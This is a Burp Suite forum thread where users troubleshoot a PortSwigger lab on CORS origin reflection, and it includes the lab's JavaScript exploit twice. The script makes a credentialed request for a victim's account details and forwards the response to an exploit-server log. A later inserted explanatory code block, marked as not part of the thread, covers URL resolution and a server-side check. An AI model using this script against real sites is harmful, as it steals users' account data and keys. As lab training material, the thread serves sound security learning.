Burp Suite User Forum


Lab: CORS vulnerability with basic origin reflection not working

Todd | Last updated: Dec 21, 2022 04:58AM UTC

In this lab, I'm stuck on step 5 of the solution: In the browser, go to the exploit server and enter the following HTML, replacing YOUR-LAB-ID with your unique lab URL:

    <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
    </script>

After replacing YOUR-LAB-ID with my lab ID, and then clicking View Exploit, the server appears to hang and I don't get a response. If I click Deliver Exploit to Victim, the server redirects me to the exploit server page.

Todd | Last updated: Dec 21, 2022 05:00AM UTC

Update: CORS lab 2 isn't working either.

Malinga | Last updated: Dec 21, 2022 12:17PM UTC

CORS labs are not working for me either.

Liam, PortSwigger Agent | Last updated: Dec 21, 2022 02:50PM UTC

Thanks for these reports, Todd and Malinga. Our tests are passing for our CORS labs. Do you have another machine/network to test this on?

Todd | Last updated: Dec 22, 2022 01:40AM UTC

Hi, yes, I tried Firefox and Chrome on Mac OS 64 bit ARM, Ubuntu Linux 64 bit ARM, and Windows 64 bit on Intel, from two different networks (different physical locations and IPs as well). Unfortunately the same result in each case. It's a head-scratcher.

Liam, PortSwigger Agent | Last updated: Dec 22, 2022 01:38PM UTC

Hi Todd. We've manually completed the lab today. The lab is also passing our automated testing.

Todd | Last updated: Dec 22, 2022 02:50PM UTC

Could you tell me which OS and browser you're using? Then I can try that combo and see if I can recreate the problem. I know these problems are hard to track down -- it's part of my job too, so I understand. Thanks.

Todd | Last updated: Dec 22, 2022 02:54PM UTC

I tried it again this morning and the key is not in the URL as described in the lab. Here's what I see: https://<redacted>.exploit-server.net/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

Liam, PortSwigger Agent | Last updated: Dec 23, 2022 09:49AM UTC

Thanks, Todd. We'll look into this again. However, it is likely to be after the holidays.

Todd | Last updated: Dec 28, 2022 04:18AM UTC

SOLVED: The text 'YOUR-LAB-ID' in the lab's solution is not completely correct. Taken literally, this value is just '<random number>.web-security-academy.net'. However, the prefix needs to be included in that string for the call to req.open() to work, so the parameter must actually be 'https://<random number>.web-security-academy.net'. This solution is clearer:

    <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
    </script>
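Added example, not part of the thread or of PortSwigger's lab material: it reproduces the failure Todd diagnosed. XMLHttpRequest.open() resolves its URL argument against the document's base URL, so a scheme-less host name becomes a path on the exploit server (hence the "Resource not found - Academy Exploit Server" text in the log), and it adds a defender-side check for the response-header pattern this lab is about. The host names are constructed placeholders.

```javascript
// Constructed placeholders standing in for the real lab and exploit-server hosts.
const EXPLOIT_PAGE = 'https://exploit-0a1b2c3d.exploit-server.net/exploit';
const LAB_HOST = '0a1b2c3d.web-security-academy.net';

// Mirrors the URL resolution XMLHttpRequest.open() performs: the argument is
// parsed relative to the document's base URL, as the WHATWG URL constructor does.
function resolveXhrTarget(urlArgument, documentUrl) {
  return new URL(urlArgument, documentUrl).href;
}

// True only when the resolved request actually leaves the exploit page's origin,
// i.e. when the browser would treat it as a cross-origin request to the lab.
function isCrossOriginRequest(urlArgument, documentUrl) {
  const target = new URL(urlArgument, documentUrl);
  return target.origin !== new URL(documentUrl).origin;
}

// Defender-side check for the misconfiguration the lab demonstrates: the server
// echoes the request's Origin into Access-Control-Allow-Origin and at the same
// time sets Access-Control-Allow-Credentials: true. Header names are lower-cased
// keys of a plain object, as fetch()/Node expose them.
function reflectsArbitraryOrigin(requestOrigin, responseHeaders) {
  const acao = responseHeaders['access-control-allow-origin'];
  const acac = (responseHeaders['access-control-allow-credentials'] || '').toLowerCase();
  return acao === requestOrigin && acac === 'true';
}

// Literal reading of the lab solution: resolves to a path on the exploit server.
const brokenTarget = resolveXhrTarget(LAB_HOST + '/accountDetails', EXPLOIT_PAGE);
// -> 'https://exploit-0a1b2c3d.exploit-server.net/0a1b2c3d.web-security-academy.net/accountDetails'

// With the scheme present the URL is absolute and reaches the lab host.
const fixedTarget = resolveXhrTarget('https://' + LAB_HOST + '/accountDetails', EXPLOIT_PAGE);
// -> 'https://0a1b2c3d.web-security-academy.net/accountDetails'

console.log(brokenTarget, isCrossOriginRequest(LAB_HOST + '/accountDetails', EXPLOIT_PAGE));
console.log(fixedTarget, isCrossOriginRequest('https://' + LAB_HOST + '/accountDetails', EXPLOIT_PAGE));
```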

Kavitha | Last updated: May 18, 2023 09:42PM UTC

Your Script didn't work for me Todd

Ben, PortSwigger Agent | Last updated: May 19, 2023 06:36AM UTC

Hi Kavitha, Can you provide some details of the steps that you are taking to try and solve this lab so that we can assist you further?

Joe | Last updated: Jun 17, 2023 05:16PM UTC

Didn't work for me either Todd

Damian | Last updated: Jul 07, 2023 12:09PM UTC

Still it doesn't work!

Michelle, PortSwigger Agent | Last updated: Jul 07, 2023 12:47PM UTC

Is there a specific CORS lab you're having issues with, or more than one? Can you please tell us more about the problems you're seeing and at what stage of the lab they occur?

Gareth | Last updated: Sep 04, 2023 08:20AM UTC

Hi all, I am having the same issue with this lab: Lab: CORS vulnerability with basic origin reflection. When I enter the JS with my lab URL, I either receive a page full of GET/POST requests or a blank screen:

    GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

I have tried without the 'https://' and with 'Https://'. Any ideas? Thanks

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 10:32AM UTC

Hi, in step 6, when you view the exploit, you will see the access logs for the exploit server on the main page, but if you check the URL that you have visited in the main URL bar, you should see the additional information. I hope this helps. You might also find it useful to follow along with the community solution video.
